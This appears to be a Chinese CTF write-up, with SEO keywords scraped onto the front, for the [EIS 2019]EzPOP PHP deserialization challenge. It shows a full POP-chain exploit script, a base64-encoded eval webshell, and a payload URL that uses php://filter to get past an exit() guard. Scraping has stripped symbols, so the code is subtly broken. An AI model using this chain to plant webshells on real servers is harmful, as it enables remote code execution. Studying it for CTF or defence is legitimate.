营销型网站建设实训总结,鞍山网站建设优化,领英怎么注册公司主页,赣州新闻综合频道回放文章目录 php://filter绕过死亡exit前言[EIS 2019]EzPOP绕过exit 参考 php://filter绕过死亡exit
前言
最近写了一道反序列化的题#xff0c;其中有一个需要通过php://filter去绕过死亡exit()的小trick#xff0c;这里通过一道题目来讲解
[EIS 2019]EzPOP
题目源码#… 文章目录 php://filter绕过死亡exit前言[EIS 2019]EzPOP绕过exit 参考 php://filter绕过死亡exit
前言
最近写了一道反序列化的题其中有一个需要通过php://filter去绕过死亡exit()的小trick这里通过一道题目来讲解
[EIS 2019]EzPOP
题目源码
?php
error_reporting(0);class A {protected $store;protected $key;protected $expire;public function __construct($store, $key flysystem, $expire null) {$this-key $key;$this-store $store;$this-expire $expire;}public function cleanContents(array $contents) {$cachedProperties array_flip([path, dirname, basename, extension, filename,size, mimetype, visibility, timestamp, type,]);foreach ($contents as $path $object) {if (is_array($object)) {$contents[$path] array_intersect_key($object, $cachedProperties);}}return $contents;}public function getForStorage() {$cleaned $this-cleanContents($this-cache);return json_encode([$cleaned, $this-complete]);}public function save() {$contents $this-getForStorage();$this-store-set($this-key, $contents, $this-expire);}public function __destruct() {if (!$this-autosave) {$this-save();}}
}class B {protected function getExpireTime($expire): int {return (int) $expire;}public function getCacheKey(string $name): string {return $this-options[prefix] . $name;}protected function serialize($data): string {if (is_numeric($data)) {return (string) $data;}$serialize $this-options[serialize];return $serialize($data);}public function set($name, $value, $expire null): bool{$this-writeTimes;if (is_null($expire)) {$expire $this-options[expire];}$expire $this-getExpireTime($expire);$filename $this-getCacheKey($name);$dir dirname($filename);if (!is_dir($dir)) {try {mkdir($dir, 0755, true);} catch (\Exception $e) {// 创建失败}}$data $this-serialize($value);if ($this-options[data_compress] function_exists(gzcompress)) {//数据压缩$data gzcompress($data, 3);}$data ?php\n// . sprintf(%012d, $expire) . \n exit();?\n . $data;$result file_put_contents($filename, $data);if ($result) {return true;}return false;}}if (isset($_GET[src]))
{highlight_file(__FILE__);
}$dir uploads/;if (!is_dir($dir))
{mkdir($dir);
}
unserialize($_GET[data]);
刚开始看到这题很懵逼我们这里反过来讲首先容易看出这段代码应该是需要我们写一个shell进去
$data ?php\n// . sprintf(%012d, $expire) . \n exit();?\n . $data;
$result file_put_contents($filename, $data);我们溯源一下filename和data的值是从哪里传过来的
$filename $this-getCacheKey($name);
$data $this-serialize($value);可以看到这两个值是从函数public function set($name, $value, $expire null): bool的形参中传过来的如何调用set()方法呢我们需要注意到A::__destruct()
A::__destruct() - save() - set()set()会被A的变量store调用所以store就需要传递一个B类的对象。而A调用set()传递了三个参数
set($this-key, $contents, $this-expire) 其中key在构造方法中赋值$contents在哪来呢
$contents $this-getForStorage() - $this-cleanContents($this-cache)$this-cache变量传入cleanContents()返回最终通过json串形式返回给$contents
其实getForStorage()和cleanContents()没什么用这里不用管$expire也没什么用
经过分析我们知道在A类中$key传入的是写入文件的名字$cache可以最终传给$contents然后当作文件内容写入$store存储B类对象$complete、$expire为空值即可
这样我们能够确定B类set()中file_put_contents()的两个变量了但是怎么绕过exit()不绕过写了shell也没用
这里通过 p神文章 学习了通过php://filter绕过
我们可以使用该php://filter的base64-decode、rot13、strip_tags等过滤器来绕过这里我们使用base64-decode
绕过exit
如果我们在写入文件的前面有exit()例如
?php
$filename$_POST[filename];
$content$_POST[content];
file_put_contents($filename,?php exit();?.$content);我们这里$filename $content 都是可以控制的于是我们可以使用php://filter/writeconvert.base64-decode/
当我们的$filename为php://filter/writeconvert.base64-decode/resourceshell.php PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg 是?php eval($_POST[1]);?的base64编码 并且$content: xPD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg
那么就可以进行绕过shell.php:
^q?php eval($_POST[1]);?这是什么原理呢当我们文件名是php://filter伪协议并且进行base64解码时就会将写入文件内容的数据进行一次base64解码于是原来的?php exit();?经过解码后就失效了PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg经过解码就形成了一句话木马。
为什么这里$content前要加一个字母x因为base64解码是4个一组?php exit();?为15个字符加上一个刚好凑够16个不干扰后面的base64解码
知道绕过exit就简单了我们可以将一句话木马base64编码两遍传给A::cache变量然后设置一下B中的options数组
$this-options array(serializebase64_decode,expire123);这样B中的data就是经过了一个base64解码后的值了
$data $this-serialize($value);然后在php://filter是base64解码两次写入了shell.php中
我们编写exp
?phpclass A
{protected $store;protected $key;protected $expire;public $complete;public $cache;public function __construct(){$this-store new B();$this-key php://filter/writeconvert.base64-decode/resourceshell.php;$this-expire null;$this-complete ;$this-cache array(YWFhUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3pGZEtUcy9QZz09);}}class B
{public $options;public function __construct(){$this-options array(serializebase64_decode,expire123);}}$a new A();
echo urlencode(serialize($a));# O%3A1%3A%22A%22%3A5%3A%7Bs%3A8%3A%22%00%2A%00store%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A7%3A%22options%22%3Ba%3A2%3A%7Bs%3A9%3A%22serialize%22%3Bs%3A13%3A%22base64_decode%22%3Bs%3A6%3A%22expire%22%3Bs%3A3%3A%22123%22%3B%7D%7Ds%3A6%3A%22%00%2A%00key%22%3Bs%3A59%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3Dshell.php%22%3Bs%3A9%3A%22%00%2A%00expire%22%3BN%3Bs%3A8%3A%22complete%22%3Bs%3A0%3A%22%22%3Bs%3A5%3A%22cache%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A52%3A%22YWFhUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3pGZEtUcy9QZz09%22%3B%7D%7D这里有个点需要注意一下 在一句话木马一次base64后需要在前面加3个a让其4个一组
写入
http://fceb4489-ee1c-434e-a4c4-a760e4026c92.node4.buuoj.cn:81/index.php?src1dataO%3A1%3A%22A%22%3A5%3A%7Bs%3A8%3A%22%00%2A%00store%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A7%3A%22options%22%3Ba%3A2%3A%7Bs%3A9%3A%22serialize%22%3Bs%3A13%3A%22base64_decode%22%3Bs%3A6%3A%22expire%22%3Bs%3A3%3A%22123%22%3B%7D%7Ds%3A6%3A%22%00%2A%00key%22%3Bs%3A59%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3Dshell.php%22%3Bs%3A9%3A%22%00%2A%00expire%22%3BN%3Bs%3A8%3A%22complete%22%3Bs%3A0%3A%22%22%3Bs%3A5%3A%22cache%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A52%3A%22YWFhUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3pGZEtUcy9QZz09%22%3B%7D%7D参考
谈一谈php://filter的妙用
[EIS 2019]EzPOP
